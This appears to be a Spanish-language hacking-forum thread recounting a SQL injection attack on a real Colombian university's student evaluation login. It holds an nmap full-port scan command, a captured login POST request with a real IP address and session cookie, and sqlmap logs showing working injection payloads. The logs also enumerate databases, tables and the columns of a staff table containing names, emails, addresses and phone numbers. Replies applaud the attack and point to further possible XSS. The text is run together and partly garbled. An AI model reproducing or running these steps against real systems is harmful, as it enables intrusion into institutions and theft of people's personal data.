## For syntax checking, see:# http://www.sxw.org.uk/computing/robots/check.htmlUser-agent: *Disallow: /administrator/Disallow: /cache/Disallow: /cli/Disallow: /components/Disallow: /images/Disallow: /includes/Disallow: /installation/Disallow: /language/Disallow: /libraries/Disallow: /logs/Disallow: /media/Disallow: /modules/Disallow: /plugins/Disallow: /templates/Disallow: /tmp/
nmap ipuniversidad -v -p 1-65535
20121245
<img src="afsgsgsgs.jpg">
http://evuln.com/tools/xss-encoder/
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM CHARACTER SET `utf8`' at line 29 SQL=CREATE TABLE `jos_banner` ( `bid` int(11) NOT NULL auto_increment, `cid` int(11) NOT NULL default '0', `type` varchar(30) NOT NULL default 'banner', `name` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `imptotal` int(11) NOT NULL default '0', `impmade` int(11) NOT NULL default '0', `clicks` int(11) NOT NULL default '0', `imageurl` varchar(100) NOT NULL default '', `clickurl` varchar(200) NOT NULL default '', `date` datetime default NULL, `showBanner` tinyint(1) NOT NULL default '0', `checked_out` tinyint(1) NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `editor` varchar(50) default NULL, `custombannercode` text,
http://190.26.192.198//paquetes/autenticacion/index.php POST //paquetes/autenticacion/index.php HTTP/1.1 Host: 190.26.192.198 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://ipuniversidad//paquetes/autenticacion/index.php?accion=InicioEncuesta Cookie: PHPSESSID=oqaqa2oqt0jp2f9psi8j3958t5 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 120 redirect=index.php&accion=autenticarEstudiante&usu_login_aut=MICODIGO DE ESTUDIANTE&IMAGE.x=0&IMAGE.y=0
[12:21:54] [INFO] reading file codigos.txt[12:21:54] [INFO] testing connection to the target url[12:21:55] [INFO] testing if the url is stable, wait a few seconds[12:21:56] [INFO] url is stable[12:21:56] [INFO] testing if POST parameter 'usu_login_aut' is dynamic[12:21:57] [INFO] confirming that POST parameter 'usu_login_aut' is dynamic[12:21:57] [INFO] POST parameter usu_login_aut' is dynamic[12:21:57] [INFO] heuristic test shows that POST parameter 'usu_login_aut' might be injectable (possible DBMS: MySQL)[12:21:57] [INFO] testing for SQL injection on POST parameter usu_login_aut'[12:21:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[12:21:58] [WARNING] reflective value(s) found and filtering out[12:21:59] [INFO] POST parameter 'usu_login_aut' is 'AND boolean-based blind - WHERE or HAVING clause' injectable[12:21:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[12:22:00] [INFO] POST parameter 'usu_login_aut' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable[12:22:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'[12:22:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[12:22:21] [INFO] POST parameter 'usu_login_aut' is 'MySQL > 5.0.11 AND time-based blind' injectable[12:22:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[12:22:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found[12:22:21] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[12:22:24] [INFO] target url appears to have 18 columns in query[12:22:27] [INFO] POST parameter 'usu_login_aut' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectablePOST parameter 'usu_login_aut' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ysqlmap identified the following injection points with a total of 26 HTTP(s) requests:---Place: POSTType: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=59 AND 9932=9932 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=59 AND (SELECT 6298 FROM(SELECT COUNT(*),CONCAT(0x3a7871723a,(SELECT (CASE WHEN (6298=6298) THEN 1 ELSE 0 END)),0x3a7474633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 18 columns Payload: id=59 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a7871723a,0x78544b4f706652666f69,0x3a7474633a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=59 AND SLEEP(5)---[12:22:30] [INFO] the back-end DBMS is MySQLweb server operating system: Windows Vistaweb application technology: ASP.NET, PHP 5.2.13, Microsoft IIS 7.0back-end DBMS: MySQL 5.0[12:22:30] [INFO] fetching database names[12:22:30] [INFO] the SQL query used returns 3 entries[12:22:30] [INFO] retrieved: "information_schema"[12:22:31] [INFO] retrieved: "autoevaluacion”available databases [2]: [*] information_schema[*] autoevaluacion[12:22:31] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.universidad.edu.co'[*] shutting down at 12:22:31
back-end DBMS: MySQL 5.0[12:28:57] [INFO] fetching tables for database: 'autoevaluacion'[12:28:57] [INFO] the SQL query used returns 4 entries[12:28:57] [INFO] retrieved: "preguntas_estudiante"[12:28:58] [INFO] retrieved: "preguntas_docente"[12:28:58] [INFO] retrieved: "codigos_estudiante"[12:28:59] [INFO] retrieved: "codigos_docente"Database: autoevaluacion [4 tables]+--------------+| preguntas_estudiante || preguntas_docente || codigos_estudiante || codigos_docente |+-----------------------------+
[12:32:38] [INFO] fetching columns for table 'ćodigos_docentes in database 'autoevaluacion'Database: autoevaluacion Table: codigos_docentes+--------------+--------------+| Column | Type |+--------------+--------------+| activo | int(11) || apellidos | varchar(100) || cargo | varchar(150) || ciudad | varchar(150) || direccion | varchar(150) || email | varchar(100) || empresa | varchar(150) || id | int(11) || login | varchar(100) || nombre | varchar(100) || pais | varchar(150) || telefono | varchar(150) || temporal | varchar(100) |+--------------+--------------+
Vale , felicidades espero la 2da parte ...Ah! Si, deberías ocultar mejor el dominio Creo que mas de un "listillo" sabe que es una universidad Colombiana y por la noticia que esta ahí , se deduce fácil cual seria , PD: No me ha dejado pillar /administrator , en fin supongo que lo reportaste como buen chico :3En Fin, esperando vuestra 2da parte.
Da igual que la encuentren o no xD todo ya esta reportado y parcheado
Cita de: duvanalex3029 en Diciembre 04, 2012, 04:50:01 pmDa igual que la encuentren o no xD todo ya esta reportado y parcheado Tiene algunas posibles XSS, aparte que su Apache es una ....xD lel
Cita de: White Rabbit en Diciembre 04, 2012, 04:50:58 pmCita de: duvanalex3029 en Diciembre 04, 2012, 04:50:01 pmDa igual que la encuentren o no xD todo ya esta reportado y parcheado Tiene algunas posibles XSS, aparte que su Apache es una ....xD lelEl apace el vulnerable? o muy defasado?